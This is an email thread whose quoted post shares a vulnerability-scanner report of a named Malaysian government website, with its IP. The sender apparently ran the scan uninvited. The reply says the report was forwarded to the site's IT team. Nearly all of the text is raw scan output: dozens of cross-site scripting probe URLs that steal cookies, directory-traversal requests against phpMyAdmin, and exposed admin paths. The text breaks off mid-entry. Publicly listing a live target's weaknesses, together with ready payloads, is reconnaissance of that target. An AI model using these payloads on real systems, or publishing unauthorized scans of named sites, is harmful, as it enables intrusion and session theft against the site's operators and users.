tq bro,<br>dh fwd the info to MARDI IT team.<br><br><div class="gmail_quote">On Fri, Sep 4, 2009 at 1:29 AM, Mohd Fazli Azran Abd Malek <span dir="ltr">&lt;<a href="mailto:mfazliazran@gmail.com">mfazliazran@gmail.com</a>&gt;</span> wrote:<br>
<blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">Hi everyone,<br>
<br>
I scan one website that maybe someone interested. When i see this<br>
server it not weird that this web was many time got deface... i share<br>
with you all this web. This is one of the government website that i<br>
scan have many vulnerable and hope others will know and learn how<br>
injection and exploit can be use to application and system. Here the<br>
report of my scan:<br>
<br>
---------------------------------------------------------------------------<br>
+ Target IP:          202.186.96.231<br>
+ Target Hostname:    <a href="http://www.mardi.gov.my" target="_blank">www.mardi.gov.my</a><br>
+ Target Port:        80<br>
+ Start Time:         2009-09-05 1:01:01<br>
---------------------------------------------------------------------------<br>
+ Server: lighttpd/1.5.0<br>
+ No CGI Directories found (use &#39;-C all&#39; to force check all possible<br>
dirs)<br>
- Allowed HTTP Methods: OPTIONS, GET, HEAD, POST<br>
+ OSVDB-0: GET /help/ : Help directory should not be accessible<br>
+ OSVDB-0: GET /vgn/jsp/jspstatus56 : Vignette CMS admin/maintenance<br>
script available.<br>
+ OSVDB-0: GET /typo3conf/ : This may contain sensitive Typo3 files.<br>
+ OSVDB-0: GET /mysql/db_details_importdocsql.php?<br>
submit_show=true&amp;do=import&amp;docpath=../../../../../../../etc :<br>
phpMyAdmin allows directory listings remotely. Upgrade to version<br>
2.5.3 or higher. <a href="http://www.securityfocus.com/bid/7963" target="_blank">http://www.securityfocus.com/bid/7963</a>.<br>
+ OSVDB-8450: GET /db_details_importdocsql.php?<br>
submit_show=true&amp;do=import&amp;docpath=../../../../../../../etc :<br>
phpMyAdmin allows directory listings remotely. Upgrade to version<br>
2.5.3 or higher. <a href="http://www.securityfocus.com/bid/7963" target="_blank">http://www.securityfocus.com/bid/7963</a>.<br>
+ OSVDB-8450: GET /3rdparty/phpMyAdmin/db_details_importdocsql.php?<br>
submit_show=true&amp;do=import&amp;docpath=../../../../../../../etc :<br>
phpMyAdmin allows directory listings remotely. Upgrade to version<br>
2.5.3 or higher. <a href="http://www.securityfocus.com/bid/7963" target="_blank">http://www.securityfocus.com/bid/7963</a>.<br>
+ OSVDB-8450: GET /phpMyAdmin/db_details_importdocsql.php?<br>
submit_show=true&amp;do=import&amp;docpath=../../../../../../../etc :<br>
phpMyAdmin allows directory listings remotely. Upgrade to version<br>
2.5.3 or higher. <a href="http://www.securityfocus.com/bid/7963" target="_blank">http://www.securityfocus.com/bid/7963</a>.<br>
+ OSVDB-0: GET /SUNWmc/htdocs/ : Sun SMC (Solaris Management Console)<br>
is running.<br>
+ OSVDB-0: GET /themes/mambosimple.php?detection=detected&amp;sitename=&lt;/<br>
title&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Mambo PHP Portal/<br>
Server is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /index.php?<br>
option=search&amp;searchword=&lt;script&gt;alert(document.cookie);&lt;/script&gt; :<br>
Mambo Site Server 4.0 build 10 is vulnerable to Cross Site Scripting<br>
(XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /emailfriend/emailnews.php?id=<br>
\&quot;&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Mambo PHP Portal/Server is<br>
vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /emailfriend/emailfaq.php?id=<br>
\&quot;&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Mambo PHP Portal/Server is<br>
vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /emailfriend/emailarticle.php?id=<br>
\&quot;&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Mambo PHP Portal/Server is<br>
vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /administrator/upload.php?newbanner=1&amp;choice=<br>
\&quot;&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Mambo PHP Portal/Server is<br>
vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /administrator/popups/sectionswindow.php?type=web&amp;link=<br>
\&quot;&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Mambo PHP Portal/Server is<br>
vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /administrator/gallery/view.php?path=<br>
\&quot;&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Mambo PHP Portal/Server is<br>
vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /administrator/gallery/uploadimage.php?directory=<br>
\&quot;&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Mambo PHP Portal/Server is<br>
vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /administrator/gallery/navigation.php?directory=<br>
\&quot;&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Mambo PHP Portal/Server is<br>
vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /administrator/gallery/gallery.php?directory=<br>
\&quot;&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Mambo PHP Portal/Server is<br>
vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /index.php?dir=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; :<br>
Auto Directory Index 1.2.3 and prior are vulnerable to XSS attacks.<br>
+ OSVDB-0: GET /https-admserv/bin/index?/<br>
&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sun ONE Web Server 6.1<br>
administration control is vulnerable to XSS attacks.<br>
+ OSVDB-0: GET /clusterframe.jsp?<br>
cluster=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Macromedia JRun 4.x<br>
JMC Interface, clusterframe.jsp file is vulnerable to a XSS attack.<br>
+ OSVDB-0: GET /upload.php?type=\&quot;&lt;script&gt;alert(document.cookie)&lt;/<br>
script&gt; : Mambo PHP Portal/Server is vulnerable to Cross Site<br>
Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-4619: GET /soinfo.php?\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : The PHP script soinfo.php is vulnerable to Cross Site<br>
Scripting Set expose_php = Off in php.ini.<br>
+ OSVDB-0: GET /servlet/MsgPage?<br>
action=test&amp;msg=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : NetDetector 3.0<br>
and below are vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /servlets/MsgPage?<br>
action=badlogin&amp;msg=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : The<br>
NetDetector install is vulnerable to Cross Site Scripting (XSS) in<br>
it&#39;s invalid login message. <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de<br>
%20registro%20Web&amp;URL=MasterSettings/Web_LogSettings.asp?<br>
tab1=TabsWebServer%26tab2=TabsWebLogSettings<br>
%26__SAPageKey=5742D5874845934A134CD05F39C63240&amp;ReturnURL=<br>
\&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt; : IIS 6 on Windows 2003 is<br>
vulnerable to Cross Site Scripting (XSS) in certain error messages. <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-17665: GET /SiteServer/Knowledge/Default.asp?ctr=<br>
\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : Site Server is vulnerable to<br>
Cross Site Scripting<br>
+ OSVDB-17666: GET /_mem_bin/formslogin.asp?<br>
\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : Site Server is vulnerable to<br>
Cross Site Scripting<br>
+ OSVDB-0: GET /catinfo?&lt;u&gt;&lt;b&gt;TESTING : The Interscan Viruswall<br>
catinfo script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /templates/form_header.php?<br>
noticemsg=&lt;script&gt;javascript:alert(document.cookie)&lt;/script&gt; :<br>
MyMarket 1.71 is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /supporter/index.php?<br>
t=updateticketlog&amp;id=&amp;lt;script&amp;gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt;&amp;lt;/script&amp;gt; : MyHelpdesk from <a href="http://myhelpdesk.sourceforge.net/" target="_blank">http://myhelpdesk.sourceforge.net/</a><br>
  versions v20020509 and older are vulnerable to Cross Site Scripting<br>
(XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /supporter/index.php?<br>
t=tickettime&amp;id=&amp;lt;script&amp;gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt;&amp;lt;/<br>
script&amp;gt; : MyHelpdesk from <a href="http://myhelpdesk.sourceforge.net/" target="_blank">http://myhelpdesk.sourceforge.net/</a><br>
versions v20020509 and older are vulnerable to Cross Site Scripting<br>
(XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /supporter/index.php?<br>
t=ticketfiles&amp;id=&amp;lt;script&amp;gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt;&amp;lt;/script&amp;gt; : MyHelpdesk from <a href="http://myhelpdesk.sourceforge.net/" target="_blank">http://myhelpdesk.sourceforge.net/</a><br>
  versions v20020509 and older are vulnerable to Cross Site Scripting<br>
(XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /sunshop.index.php?<br>
action=storenew&amp;username=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; :<br>
SunShop is vulnerable to Cross Site Scripting (XSS) in the signup<br>
page. CA-200-02.<br>
+ OSVDB-0: GET /submit.php?subject=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt;&amp;story=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt;&amp;storyext=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt;&amp;op=Preview :<br>
This install of PHPNuke is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /ss000007.pl?PRODREF=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : Actinic E-Commerce services is vulnerable to Cross Site<br>
Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /setup.exe?&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt;&amp;page=list_users&amp;user=P : CiscoSecure ACS v3.0(1) Build 40<br>
allows Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: POST /servlet/custMsg?guestName=&lt;script&gt;alert(\&quot;Vulnerable<br>
\&quot;)&lt;/script&gt; : Bajie HTTP JServer is vulnerable to Cross Site<br>
Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: POST /servlet/CookieExample?<br>
cookiename=&lt;script&gt;alert(\&quot;Vulnerable\&quot;)&lt;/script&gt; : Bajie HTTP JServer<br>
is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /servlet/ContentServer?<br>
pagename=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : Open Market<br>
Inc.ÊContentServer is vulnerable to Cross Site Scripting (XSS) in the<br>
login-error page. <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /search/index.cfm?&lt;script&gt;alert(\&quot;Vulnerable\&quot;)&lt;/<br>
script&gt; : Search agent allows Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /search.php?zoom_query=&lt;script&gt;alert(\&quot;hello\&quot;)&lt;/<br>
script&gt; : Wrensoft Zoom Search Engine is vulnerable to Cross Site<br>
Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /search.php?<br>
searchstring=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Gallery 1.3.4<br>
and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the<br>
latest version. <a href="http://www.securityfocus.com/bid/8288" target="_blank">http://www.securityfocus.com/bid/8288</a>.<br>
+ OSVDB-0: GET /search.php?searchfor=\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;);&lt;/<br>
script&gt; : Siteframe 2.2.4 is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /search.asp?term=&lt;%00script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : ASP.Net 1.1 may allow Cross Site Scripting (XSS) in error<br>
pages (only some browsers will render this). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /replymsg.php?<br>
send=1&amp;destin=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : This version of<br>
PHP-Nuke&#39;s replymsg.php is vulnerable to Cross Site Scripting (XSs). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /pm_buddy_list.asp?name=A&amp;desc=B<br>
%22%3E&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt;%3Ca%20s=%22&amp;code=1 : Web<br>
Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting<br>
(XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /phpwebsite/index.php?<br>
module<br>
=<br>
search<br>
&amp;SEA_search_op=continue&amp;PDA_limit=10\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : phpWebSite 0.9.x and below are vulnerable to Cross Site<br>
Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /phpwebsite/index.php?<br>
module<br>
=<br>
pagemaster<br>
&amp;PAGE_user_op=view_page&amp;PAGE_id=10\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt;&amp;MMN_position=[X:X] : phpWebSite 0.9.x and below are vulnerable<br>
to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /phpwebsite/index.php?<br>
module=fatcat&amp;fatcat[user]=viewCategory&amp;fatcat_id=1%00+<br>
\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : phpWebSite 0.9.x and below<br>
are vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /phpwebsite/index.php?<br>
module=calendar&amp;calendar[view]=day&amp;month=2&amp;year=2003&amp;day=1+<br>
%00\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : phpWebSite 0.9.x and<br>
below are vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /phptonuke.php?filnavn=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : PHPNuke add-on PHPToNuke is vulnerable to Cross Site<br>
Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-32774: GET /phpinfo.php?VARIABLE=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : Contains PHP configuration information and is vulnerable to<br>
Cross Site Scripting (XSS).<br>
+ OSVDB-32774: GET /phpinfo.php3?VARIABLE=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : Contains PHP configuration information and is vulnerable to<br>
Cross Site Scripting (XSS).<br>
+ OSVDB-0: GET /phpBB/viewtopic.php?<br>
topic_id=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : phpBB is vulnerable to<br>
Cross Site Scripting (XSS), upgrade to the latest version. <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /phpBB/viewtopic.php?t=17071&amp;highlight=\&quot;&gt;<br>
\&quot;&lt;script&gt;javascript:alert(document.cookie)&lt;/script&gt; : phpBB is<br>
vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /phorum/admin/header.php?<br>
GLOBALS[message]=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : Phorum 3.3.2a<br>
and below from <a href="http://phorum.org" target="_blank">phorum.org</a> is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>

.<br>
+ OSVDB-0: GET /phorum/admin/footer.php?<br>
GLOBALS[message]=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : Phorum 3.3.2a<br>
and below from <a href="http://phorum.org" target="_blank">phorum.org</a> is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>

.<br>
+ OSVDB-0: GET /netutils/whodata.stm?<br>
sitename=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server<br>
default script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /nav/cList.php?root=&lt;/<br>
script&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)/&lt;script&gt; : RaQ3 server script is<br>
vulnerable to Cross Site Scripting (XSS).  <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /myphpnuke/links.php?<br>
op=search&amp;query=[script]alert(&#39;Vulnerable);[/script]?query= :<br>
myphpnuke is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /myphpnuke/links.php?<br>
op=MostPopular&amp;ratenum=[script]alert(document.cookie);[/<br>
script]&amp;ratetype=percent : myphpnuke is vulnerable to Cross Site<br>
Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /myhome.php?<br>
action=messages&amp;box=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : OpenBB<br>
1.0.0 RC3 is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /msadm/user/login.php3?account_name=<br>
\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : The Sendmail Server Site<br>
User login is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /msadm/site/index.php3?authid=<br>
\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : The Sendmail Server Site<br>
Administrator Login is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /msadm/domain/index.php3?account_name=<br>
\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : The Sendmail Server Site<br>
Domain Administrator login is vulnerable to Cross Site Scripting<br>
(XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /modules/Submit/index.php?<br>
op=pre&amp;title=&lt;script&gt;alert(document.cookie);&lt;/script&gt; : Basit cms 1.0<br>
is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /modules/Forums/bb_smilies.php?site_font=}--&gt;&lt;/<br>
style&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : PHP-Nuke 6.0 is<br>
vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /modules/Forums/bb_smilies.php?<br>
name=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : PHP-Nuke 6.0 is vulnerable<br>
to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /modules/Forums/bb_smilies.php?<br>
Default_Theme=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : PHP-Nuke 6.0 is<br>
vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /modules/Forums/bb_smilies.php?bgcolor1=<br>
\&quot;&gt;&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : PHP-Nuke 6.0 is vulnerable<br>
to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /modules.php?<br>
op<br>
=<br>
modload<br>
&amp;name<br>
=Xforum&amp;file=member&amp;action=viewpro&amp;member=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : The XForum (PHPNuke Add-on module) is vulnerable to Cross<br>
Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /modules.php?<br>
op=modload&amp;name=Xforum&amp;file=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt;&amp;fid=2 : The XForum (PHPNuke Add-on module) is vulnerable to<br>
Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /modules.php?<br>
op=modload&amp;name=Wiki&amp;file=index&amp;pagename=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : Wiki PostNuke Module is vulnerable to Cross Site Scripting<br>
(XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /modules.php?<br>
op<br>
=<br>
modload<br>
&amp;name<br>
=Web_Links&amp;file=index&amp;l_op=viewlink&amp;cid=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : The PHPNuke forum is vulnerable to Cross Site Scripting<br>
(XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /modules.php?<br>
op=modload&amp;name=WebChat&amp;file=index&amp;roomid=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : The PHPNuke forum is vulnerable to Cross Site Scripting<br>
(XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /modules.php?<br>
op<br>
=<br>
modload<br>
&amp;name=Members_List&amp;file=index&amp;letter=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : This install of PHPNuke&#39;s modules.php is vulnerable to Cross<br>
Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /modules.php?<br>
op<br>
=modload&amp;name=Guestbook&amp;file=index&amp;entry=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : The PHPNuke forum is vulnerable to Cross Site Scripting<br>
(XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-0: GET /modules.php?<br>
op=modload&amp;name=FAQ&amp;file=index&amp;myfaq=yes&amp;id_cat=1&amp;categories=%3Cimg<br>
%20src=javascript:alert(document.cookie);%3E&amp;parent_id=0 : Post Nuke<br>
0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /modules.php?<br>
op<br>
=<br>
modload&amp;name=DMOZGateway&amp;file=index&amp;topic=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/<br>
script&gt; : The DMOZGateway (PHPNuke Add-on module) is vulnerable to<br>
Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /modules.php?<br>
name<br>
=Your_Account&amp;op=userinfo&amp;username=bla&lt;script&gt;alert(document.cookie)&lt;/<br>
script&gt; : Francisco Burzi PHP-Nuke 5.6, 6.0, 6.5 RC1/RC2/RC3, 6.5 is<br>
vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-0: GET /modules.php?<br>
